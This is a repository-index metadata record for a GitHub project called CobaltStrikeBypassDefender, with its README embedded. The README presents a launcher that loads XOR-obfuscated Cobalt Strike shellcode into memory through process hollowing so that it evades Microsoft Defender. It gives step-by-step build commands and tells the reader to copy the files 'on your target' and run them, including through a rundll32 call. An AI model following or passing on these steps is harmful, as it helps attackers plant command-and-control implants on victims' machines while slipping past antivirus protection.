{"id":22647389,"url":"https://github.com/processust/cobaltstrikebypassdefender","last_synced_at":"2025-07-27T08:04:12.146Z","repository":{"id":82910829,"uuid":"564682811","full_name":"ProcessusT/CobaltStrikeBypassDefender","owner":"ProcessusT","description":"A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique","archived":false,"fork":false,"pushed_at":"2022-11-11T09:11:33.000Z","size":1603,"stargazers_count":26,"open_issues_count":0,"forks_count":10,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-06-03T22:58:38.248Z","etag":null,"topics":["cobalt","dll","hollowing","malware","process","shellcode","strike"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ProcessusT.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-11-11T08:50:39.000Z","updated_at":"2025-03-07T10:38:22.000Z","dependencies_parsed_at":null,"dependency_job_id":"263e11cf-4663-4577-b1ec-96f910634bff","html_url":"https://github.com/ProcessusT/CobaltStrikeBypassDefender","commit_stats":null,"previous_names":["processust/cobaltstrikebypassdefender"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ProcessusT/CobaltStrikeBypassDefender","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FCobaltStrikeBypassDefender","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FCobaltStrikeBypassDefender/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FCobaltStrikeBypassDefender/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FCobaltStrikeBypassDefender/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ProcessusT","download_url":"https://codeload.github.com/ProcessusT/CobaltStrikeBypassDefender/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FCobaltStrikeBypassDefender/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":267327534,"owners_count":24069442,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-07-27T02:00:11.917Z","response_time":82,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cobalt","dll","hollowing","malware","process","shellcode","strike"],"created_at":"2024-12-09T07:33:29.074Z","updated_at":"2025-07-27T08:04:12.125Z","avatar_url":"https://github.com/ProcessusT.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CobaltStrikeBypassDefender\n\u003cbr /\u003e\u003cbr /\u003e\n\n\u003ch3\u003eA launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique\u003c/h3\u003e\n\n\n\u003cbr /\u003e\u003cbr /\u003e\n-----------------------------------------------------\n\u003cbr /\u003e\n\n\u003cp align=\"center\"\u003e\n    My youtube video on this repo : \u003cbr /\u003e\u003cbr /\u003e\n    \u003ca href=\"https://youtu.be/CHk2XzFKwNc\" align=\"center\" width=\"100%;\"\u003e\n       \u003cimg src=\"https://github.com/Processus-Thief/CobaltStrikeBypassDefender/raw/main/.assets/minia.jpg\" width=\"80%;\"\u003e\n    \u003c/a\u003e\n  \u003c/p\u003e\n\n\u003cbr /\u003e\u003cbr /\u003e\n-----------------------------------------------------\n\u003cbr /\u003e\n\n\n\n\n### Usage\n\n1. Generate a x64 cobalt strike shellcode with CSSG :\n```\nhttps://github.com/RCStep/CSSG\n```\n2. Copy your shellcode in obfu.cpp (in \"ANTIVIRUS_EXCLUDED_FOLDER\" folder) and compile it :\n```  \nC:\\msys64\\mingw64\\bin\\x86_64-w64-mingw32-c++.exe -o obfu.exe obfu.cpp\n```\n3. Execute obfu.exe, give your own xor secret\n4. Copy obfuscated-shellcode.cpp content in dll.cpp file and update shellcode char array variable in process hollowing functions\n5. Compile dll.cpp and launcher.cpp :\n```\nC:\\msys64\\mingw64\\bin\\x86_64-w64-mingw32-c++.exe -o shellcode.dll -shared dll.cpp\n\nC:\\msys64\\mingw64\\bin\\x86_64-w64-mingw32-c++.exe -o launcher.exe launcher.cpp\n```\n6. Copy launcher.exe, shellcode.dll and the 3 library files on your target and execute launcher.exe or trigger the RunThatShit function with rundll32 :\n```\nrundll32 shellcode.dll, RunThatShit\n```\n7. Enjoy :)\n\u003cbr /\u003e\u003cbr /\u003e\n\n\n\n-----------------------------------------------------------------------------------\n\n\u003cbr /\u003e\u003cbr /\u003e\n\n\n\u003cp align=\"center\"\u003e\n    My blog : \u003ca href=\"https://lestutosdeprocessus.fr\"\u003e\u003cstrong\u003ehttps://lestutosdeprocessus.fr\u003c/strong\u003e\u003c/a\u003e\n    \u003cbr /\u003e\n    \u003cbr /\u003e\n    My Discord server : \u003ca href=\"https://discord.gg/JJNxV2h\"\u003e\u003cstrong\u003ehttps://discord.gg/JJNxV2h\u003c/strong\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\n\n \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fcobaltstrikebypassdefender","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprocessust%2Fcobaltstrikebypassdefender","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fcobaltstrikebypassdefender/lists"}